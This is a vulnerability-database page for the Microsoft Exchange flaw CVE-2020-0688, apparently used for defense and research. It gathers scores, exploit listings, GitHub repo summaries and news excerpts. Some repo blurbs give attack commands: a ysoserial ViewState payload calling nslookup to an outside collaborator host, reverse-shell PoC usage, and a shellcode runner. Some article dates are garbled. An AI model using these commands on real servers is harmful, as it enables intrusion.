CVSSv3: 8.8

CVE-2020-0688

Published: 11/02/2020 Updated: 13/02/2024
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 923
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.

Vulnerable Products

microsoft exchange server 2013

microsoft exchange server 2016

microsoft exchange server 2019

microsoft exchange server 2010

Exploits

# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution # Date: 2020-02-28 # Exploit Author: Photubias # Vendor Advisory: [1] portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 # [2] www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsof ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## require 'bindata' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager D ...
This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrat ...
This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis, resulting in all installations using the same validationKey and decryptionKey values. With knowledge of these values, an attacker can craft a s ...
Microsoft Exchange 2019 version 15.2.221.12 suffers from an authenticated remote code execution vulnerability ...

Github Repositories

Proxylogon

Proxylogon-106370718 Proxylogon incident: Microsoft last week released patches for Exchange Server vulnerabilities that were being exploited by attackers; tens of thousands of organisations worldwide may be affected. The domain was linked to a compromised Exchange mail server, which the attackers later used as a C&C relay, leading to a subsequent encryption attack incident. Severity: enterprises worldwide commonly use

cve-2020-0688 Usage: usage: cve-2020-0688.py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Cyber Crime and Forensics course

CCF - Cyber Crime and Forensics course: Incident response on cyber incidents. Acquisition and network analysis: Wireshark, Brim. File system and OS artifacts analysis: AccessData FTK, Autopsy, Event Log Explorer. Memory analysis: Capa, volatility. Sandboxing and static analysis of malware: Anyrun, hybrid analysis, cuckoo sandbox, ghidra, IDA, Windbg. Nobelium APT SolarWinds Inci

Quick tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method.

CVE-2020-0688-Scanner Quick C# tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method. Features: Scan hosts from an input file. Passive check: grab the Exchange version by scraping HTML content. Produces an output file. Demo. How to use. Prerequisite: Windows .NET Framework 4.5.2. Download: git clone github.com/onSec-fr/CVE-2020-0688-Scanner.git

Exchange study: collected and wrote some Exchange scripts. CheckInfo: detects vulnerabilities based on the Exchange version and patch date. Version identification: obtain the short version via the owa endpoint; obtain the full version via the /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application endpoint; obtain the full version from the X-OWA-Version response header of the /owa/service and /owa endpoints. Brute-force /ec

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

PSForgot2kEyXCHANGE PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell. Usage: This PoC requires a valid Username and Password. This PoC uses ysoserial.net to create the new ViewState which contains the command you specified on the -Command param. If you don't already have this installed on your system, download it here. PS> .\PSForgot2kEyXCHANGE.ps1 PS>

Red Team Cheatsheet in constant expansion.

Red Team Techniques Initial Access Techniques (soon) Code Execution Techniques (soon) Lateral Movement Techniques (soon) Evasion Techniques (soon) Persistence Techniques (soon) Privilege Escalation Techniques (soon) Credential Dumping Techniques (soon) Pivoting Techniques (soon) Windows Protocols and Terminologies Windows Protocols and Terminologies Guide (soon) Miscs O

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.

Description: A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts. The current gadget triggers a call to Activator.CreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba; this means it can be used to trigger execution of your .NET assembly of choice

CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability

CVE-2020-0688 CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability. Installation Instruction: Download using git (Requires git): git clone github.com/7heKnight/CVE-2020-0688 Download Zip File: github.com/7heKnight/CVE-2020-0688/archive/refs/heads/main.zip pip install urllib3 requests Usage: python poc.py -s <Server/ip&

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by setting heade

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE). Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey and decryptionKey values in web.config. Thus, an authenticated attacker can trick the server into deserializing maliciously crafted ViewSta

A command line tool to search AttackerKB.

AKB-Explorer A command line tool to search AttackerKB. How to install: Not much to do, you just have to clone the repo and install the required python libraries: git clone github.com/horshark/akb-explorer/ pip install -r requirements.txt Then you need to add your AKB API key in config/api.txt. You can retrieve it from your AKB profil

Windows-Active-Directory-Cheatsheet A cheatsheet to help during intrusion steps in a Windows environment. Summary: Tools, Enumeration, Pre auth (Find valid users, Find valid credentials, AS REP Roast, Responder, Leak NetNTLM Hashes), Post auth (Domain info, Powerview, Bloodhound, Ldeep, SPNs), Privilege Escalation (PowerUp, WinPeas, FullPower, PrintSpoofer, Potatoes, DNS Admin) A

cve-2020-0688

cve-2020-0688 cve-2020-0688 Login with a user with an email address; privilege is nothing to worry about. Grab __VIEWSTATEGENERATOR from the page source. Grab the value of the ASPNET_SessionId cookie for the viewstateuserkey value. Download YSO here. ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdasmyburpcollabnet" --validationalg="SHA1"

Vulnerability scanner for CVE-2020-0688

Identify Exchange Servers vulnerable to CVE-2020-0688 CVE-2020-0688 is a critical vulnerability in Microsoft Exchange due to use of static keys Although exploitation requires valid credentials (at an email user level) and the risk of mass-exploitation is low, this vulnerability might be very useful in targeted attacks as it leads to SYSTEM level RCE More information: https:/

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time. Knowledge of the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM. About Vulnerability: The bug is found in the Exchange

CVE-2020-0688_EXP Auto trigger payload & encrypt method

CVE-2020-0688_EXP CVE-2020-0688_EXP Auto trigger payload python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PA

Exchange Scanner CVE-2020-0688

CVE-2020-0688 Scanner This is a little dirty script to check for Exchange Servers vulnerable to CVE-2020-0688. It's written ugly and in PHP. Caution: It only checks if you have the actual CU update installed. That doesn't mean that you have installed the bugfix patch! Requirements: You need php-cli and php-curl. Usage: First clone the repo: git clone github.com/r

CVE-2020-0688 PoC

ecp_slap This proof-of-concept for CVE-2020-0688 includes functions for the scanning and exploitation of a vulnerable on-prem Exchange instance. Usage: scan - provide credentials and target information to obtain cookies required for exploitation and save them to 'cookies.txt'. Also checks for exposure of the Exchange Control Panel (ECP) service for the targeted Excha

C Sharp codes of my blog.

Homework-of-C-Sharp C Sharp codes of my blog. Shellcode.cs: Use CreateThread to run shellcode. ShellcodeBase64.txt: Base64 of the shellcode (msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp). ReadShellcode.cs: It will read ShellcodeBase64.txt and launch the shellcode. DumpLsass.cs: Source code is github.com/GhostPack/SafetyKatz. Remove some functions of th

Exploit and detect tools for CVE-2020-0688

Exploit and detect tools for CVE-2020-0688 (Microsoft Exchange default MachineKeySection deserialize vulnerability). build: csc ExchangeCmd.cs csc ExchangeDetect.cs usage: ExchangeDetect <target> <user> <pass> ExchangeCmd <target> <user&

Scans for Microsoft Exchange Versions with masscan

CVE-2020-0688-Scanner This script scans an IP/range/CIDR and outputs the Microsoft Exchange Servers and Versions discovered. The specified IP/range/CIDR will be scanned with masscan on port tcp/443. After a successful scan it tries to HTTP GET "/owa/auth/logon.aspx" with curl to grab the Outlook Web Access page source for build versions to display. On Small Business S

CVE-2020-0688 - Exchange

python3 CVE-2020-0688.py mail.chinabaiker.com username@domain.com password command

I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that

cve-2020-0688 I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that. Modify these inputs before running the file: url = "mail.something.com" #input 1* command = "cmd /c echo OOOPS!!! > c:/truongtntxt" #input2* aspsession = "1111a11c-11ad-1c11-1111-1111122f5977&

PoC RCE Reverse Shell for CVE-2020-0688

CVE-2020-0688 Working Exploit PoC (CVE-2020-0688) - Reverse Bind Shell. Tested using Python 2.7. To Install: pip install -r requirements.txt To Run: python CVE-2020-0688-POC.py 1016124 -lhost 10111 -lport 4444

cve-2020-0688 UNIVERSAL Python implementation utilizing ASPX webshell for command output

Exchange Remote Code Execution (cve-2020-0688) - RED TEAM [MODE ON] require: python3+ [UNIVERSAL] Python implementation for (cve-2020-0688), utilizing ASPX webshell for custom command output. This is just a POC to facilitate vulnerability demonstrations. For security reasons I disapprove of every illegal action, and I'm not responsible for any actions this script does

justtest

cve-2020-0688 Usage: usage: cve-2020-0688.py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

SMBMap is a handy SMB enumeration tool

SMBMap SMBMap allows users to enumerate samba share drives across an entire domain List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large netw

Notepad Everything I still have pending to review. Machine Tally # Nmap 7.94 scan initiated Tue Jan 16 22:11:14 2024 as: nmap -sCV -p21,80,135,139,445,808,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -vvv -oN Scan 101291183 Nmap scan report for 101291183 Host is up, received echo-reply ttl 127 (0.31s latency) Scanned at 2024-01-16 22:11:15 EST fo

ViperX Offensive Security

ViperX Research labs Presentations | 0-days/CVE's | Articles | More+ Dear Colleagues and Partners, We are pleased to announce the establishment of the ViperX Research Labs Repository, a significant initiative aimed at advancing the field of cybersecurity through collaborative and transparent research Our decision to create this repository stems from a deep understanding

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

CVE-2020-0688 modified exploit for Exchange 2010

The main issue with Exchange 2010 is that it's .NET 2.0 based and generic deserialization gadgets do not work. All credits go to zcgonvh and EazyLov3. The project is just a combination of: github.com/zcgonvh/CVE-2020-0688/ www.buaq.net/go-41757.html How to execute: compile; run Exch2010.exe 192.168.68.110 domain\user P@ssw0rd; run ExchangeCmd.exe 19216868

GUI Exploit Tool for CVE-2020-0688

CVE-2020-0688-GUI GUI Exploit Tool for CVE-2020-0688

"Powershell script assisting with domain enumerating and in finding quick wins" - Basically written while doing the 'Advanced Red Team' lab from pentesteracademy.

Invoke-Recon Powershell script as a first big step for AD enumeration. Quickwins focused. Because typing the same Powershell commands over and over is tedious. Prerequisites: Git clone and run: git clone --recurse-submodules github.com/phackt/Invoke-Recon.git && cd .\Invoke-Recon .\Invoke-Recon.ps1 -Domain us.funcorp.local | Tee-Object -FilePath .\usfunc

Red Team reference, modified from Ridter's https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration Cheatsheets. Modified by: z3r0yu. Blog: zeroyu.xyz. Table of Contents: Information gathering; Open-source intelligence (OSINT) collection; github; whois lookup / registrant reverse lookup / email reverse lookup / related assets; google hacking; building an enterprise password dictionary; dictionary lists; password generation; obtaining email lists; leaked password lookup; collecting information about the enterprise from external sources; subdomain acquisition

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming. *References: github.com/GhostPack github.com/rootm0s/WinPwnage github.com/0xbadjuju/WheresMyImplant github.com/hfiref0x/UACME github.com/RhinoSecurityLabs/Aggressor-Scripts pentestmag.com/simpleshellcodeinjector-ssi/ gist.github.com/N4kedTurtle/823

Recent Articles

Microsoft Patch Tuesday – February 2020
Symantec Threat Intelligence Blog • Preethi Koroth • 12 Feb 2024

This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

Posted: 12 Feb, 2020. This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical. As always, customers are advised to follow these security best practices: Install vendor patches as soon as they are available. Run all software with the least privileges required...

Android banking malware sharply increased in the first chunk of 2021, reckons ESET
The Register • Gareth Corfield • 04 Jun 2021

Claims Russia's FSB was poking around an Eastern European ministry

While enterprises stagger under sustained ransomware attacks, Android users are increasingly being targeted by banking malware, with Slovakian infosec firm ESET reckoning it had seen a 159 per cent increase in such malicious software over the last few months. Even though banking malware aimed at users of the Google mobile OS sharply increased in popularity, overall mobile threat detections on the Google-owned operating system declined by 18.8 per cent quarter-on-quarter, said ESET. “Android Ban...

What do F5, Citrix, Pulse Secure all have in common? China exploiting their flaws to hack govt, biz – Feds
The Register • Shaun Nichols in San Francisco • 14 Sep 2020

Beijing's snoops don't even need zero-days to break into valuable networks

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses. Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted. In a joint statement, the FBI and Homeland Security's Cybersecurity and Inf...

Enjoyed the US Labor Day weekend? Because it's September 2020 and Exchange Server can be pwned via email
The Register • Shaun Nichols in San Francisco • 08 Sep 2020

Don't be so smug, Mac users, you're open to an InDesign project file

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others. September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate. None of the bugs have public exploit code or in-the-wild attacks yet. Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says that far and away ...

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of. This is our latest installment, focus...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday. Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities. These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typically be expl...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021, according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years. Of course, the US Cyb...